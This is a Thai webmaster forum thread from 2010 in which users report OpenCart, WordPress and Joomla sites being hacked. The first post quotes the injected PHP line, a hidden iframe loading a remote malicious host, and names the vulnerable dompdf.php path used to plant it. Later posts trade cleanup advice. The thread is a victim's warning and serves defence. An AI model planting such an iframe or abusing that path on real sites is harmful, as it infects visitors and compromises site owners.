ohmohm
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 170
ออฟไลน์
กระทู้: 3,099
|
|
« เมื่อ: 13 เมษายน 2010, 00:20:47 » |
|
เข้าไปดูของตัวเอง พอจะคลิ๊กสินค้า เจอ dialog เตือนจาก stein.cz.cc ทำนองว่า browser เก่าไป พอไปดู conf.php ของตัวเอง ด้วย ftp พบว่า modified date เป็นเมื่อวาน ซึ่งไม่น่าเป็นไปได้ get มาดู ก็เจอ $INJ = '<iframe width=0 height=0 style='display:none' src="http://adsanalytics.net/in.cgi?2"></iframe>'; พอเอา คำว่า adsanalytics.net ไปค้น เจอเลยครับ http://forum.opencart.com/viewtopic.php?f=20&t=13276 มันโจมตี ผ่าน system/helper/dompdf/dompdf.php มันพึ่งโจมตี วันที่ 11 ก็คือเมื่อไม่กี่วันนี้เองครับ เลยมีออก v1.4.7 มาแก้ทันทีกันเลยครับ
|
|
|
บันทึกการเข้า
|
|
|
|
PornClip
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 185
ออฟไลน์
กระทู้: 1,887
|
|
« ตอบ #1 เมื่อ: 13 เมษายน 2010, 00:25:05 » |
|
|
|
|
บันทึกการเข้า
|
|
|
|
|
andiklin
สมุนแก๊งเสียว
พลังน้ำใจ: 71
ออฟไลน์
กระทู้: 516
|
|
« ตอบ #3 เมื่อ: 13 เมษายน 2010, 00:54:18 » |
|
ขอบคุณที่มาเตือนครับ เดี๋ยวต้องไปดูของตัวเองแล้วครับ
|
|
|
บันทึกการเข้า
|
|
|
|
Halogen
สมุนแก๊งเสียว
พลังน้ำใจ: 13
ออฟไลน์
กระทู้: 971
|
|
« ตอบ #4 เมื่อ: 13 เมษายน 2010, 01:49:40 » |
|
เลิกใช้ไปแล้วครับ
|
|
|
บันทึกการเข้า
|
|
|
|
vii
Verified Seller
สมุนแก๊งเสียว
พลังน้ำใจ: 132
ออฟไลน์
กระทู้: 946
|
|
« ตอบ #5 เมื่อ: 15 เมษายน 2010, 08:49:49 » |
|
โดนเต็มๆซะแล้วสำหรับ e-commerce ไอ้ตัวเล็กตัวนี้.. ก็อัปเดทแก้กันไป ตอนนี้พวกสคริป shopping cart ฟรีมีหลายตัวแต่ที่เวิร์คจริงมันน้อยเหลือเกิน magento ก็ดีแต่ใหญ่และอืดมาก ต้องเล่นระดับ vps prestashop ตัวใหม่แค่ติดตั้งแล้วลองสั่งซื้อ เอ่อ.. order creation failed เอาตรงขั้นตอนสุดท้าย opencart ก็น่าจะดี... oscommerce ...เก่ามาก..
|
|
|
บันทึกการเข้า
|
|
|
|
moneylicker
ก๊วนเสียว
พลังน้ำใจ: 17
ออฟไลน์
กระทู้: 345
|
|
« ตอบ #6 เมื่อ: 18 เมษายน 2010, 09:39:31 » |
|
ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
ohmohm
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 170
ออฟไลน์
กระทู้: 3,099
|
|
« ตอบ #7 เมื่อ: 18 เมษายน 2010, 16:39:17 » |
|
มันคง inject มาทาง /artshop/upload/system/helper/dompdf/dompdf.php?input_file= ( http://forum.opencart.com/viewtopic.php?f=20&t=13212 ) ละครับ ลบไฟล์นี้ออก ก็น่าจะปลอดภัย ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ
ใช้ wp version ไหนฮะ
|
|
|
บันทึกการเข้า
|
|
|
|
โกโลโกโส
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 384
|
|
« ตอบ #8 เมื่อ: 18 เมษายน 2010, 17:08:05 » |
|
ผมใช้ wp 2.9.1 ก็โดนเหมือนกันครับแก้ยังไงตรงไหน ท่านใดรู้ช่วยบอกผมที - -"
|
|
|
บันทึกการเข้า
|
|
|
|
HotelBestBuy
ก๊วนเสียว
พลังน้ำใจ: 33
ออฟไลน์
กระทู้: 493
|
|
« ตอบ #9 เมื่อ: 18 เมษายน 2010, 17:13:05 » |
|
joomla บางเวบที่ทำเพิ่งโดนตัวนี้เข้าไปครับ ยังไม่ทันได้ไล่ดูละเอียด แต่รู้สึกว่าอาจเกียวกับ url redirect ในเวบด้วย -_-'
|
|
|
บันทึกการเข้า
|
|
|
|
mama2008
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 869
|
|
« ตอบ #10 เมื่อ: 18 เมษายน 2010, 17:44:11 » |
|
wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ
|
|
|
บันทึกการเข้า
|
|
|
|
mama2008
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 869
|
|
« ตอบ #11 เมื่อ: 18 เมษายน 2010, 17:52:09 » |
|
คราวก่อนโดน iframe มันไปฝั่งไว้ใน เทมเพลตเปลี่ยนเทมเพลตก็หาย คราวนี้พอเปลี่ยน เทมเพลต เว็บหายเลยพี่น้อง ใครโดนระวังหน่อยนะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
โกโลโกโส
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 384
|
|
« ตอบ #12 เมื่อ: 18 เมษายน 2010, 17:56:40 » |
|
wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ
แก้ได้แจ้งด้วยนะครับ ผมหาอยู่แต่ยังไม่เจอ (ทำไม่เป็นด้วยครับ อิอิ)
|
|
|
บันทึกการเข้า
|
|
|
|
xinexo
ก๊วนเสียว
พลังน้ำใจ: 34
ออฟไลน์
กระทู้: 254
|
|
« ตอบ #13 เมื่อ: 18 เมษายน 2010, 17:57:32 » |
|
ใครใช้รีบอัพด่วนนะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
mama2008
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 869
|
|
« ตอบ #14 เมื่อ: 18 เมษายน 2010, 18:41:44 » |
|
wp ใครโดนบ้างครับ ยังหาทางแก้ไม่ได้เลย
|
|
|
บันทึกการเข้า
|
|
|
|
โกโลโกโส
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 384
|
|
« ตอบ #15 เมื่อ: 18 เมษายน 2010, 18:44:02 » |
|
^ ^ ^ ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ
โชคดีนะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
mama2008
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 869
|
|
« ตอบ #16 เมื่อ: 18 เมษายน 2010, 18:52:17 » |
|
^ ^ ^ ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ
โชคดีนะครับ
ลงใหม่!!!!!!!!!! และข้อมูลเก่าละครับ ลงใหม่นี่หมายถึงเอามาทับอันเดิมใช่ไหมครับ หรือว่าลบทำใหม่เลย
|
|
|
บันทึกการเข้า
|
|
|
|
โกโลโกโส
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 384
|
|
« ตอบ #17 เมื่อ: 18 เมษายน 2010, 19:03:41 » |
|
ผมลบแล้วลงใหม่นะครับ ทำแบบบ้านๆเลย เอิ๊กๆ
ผมลบ wp ตัวเก่าออกหมด เก็บแค่ theme plugin ไฟล์ที่อัพโหลด ไฟล์wp-config ไว้ก่อน ส่วนDBผมไม่ได้ลบนะครับ แล้วก็อัพ wp ตัวใหม่ขึ้นไป แล้วก็เอาไฟล์ที่แบ็คอัพไว้ทั้งหมดอัพขึ้นไปไว้ตำแหน่งเดิม
**ที่จริงผมว่าอัพทับมันก็น่าจะได้นะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
mama2008
สมุนแก๊งเสียว
พลังน้ำใจ: 22
ออฟไลน์
กระทู้: 869
|
|
« ตอบ #18 เมื่อ: 18 เมษายน 2010, 19:08:21 » |
|
ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ
|
|
|
บันทึกการเข้า
|
|
|
|
โกโลโกโส
ก๊วนเสียว
พลังน้ำใจ: 5
ออฟไลน์
กระทู้: 384
|
|
« ตอบ #19 เมื่อ: 18 เมษายน 2010, 19:09:59 » |
|
ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ
ถ้ารู้วิธีบอกผมด้วยนะครับ ^ ^
|
|
|
บันทึกการเข้า
|
|
|
|
|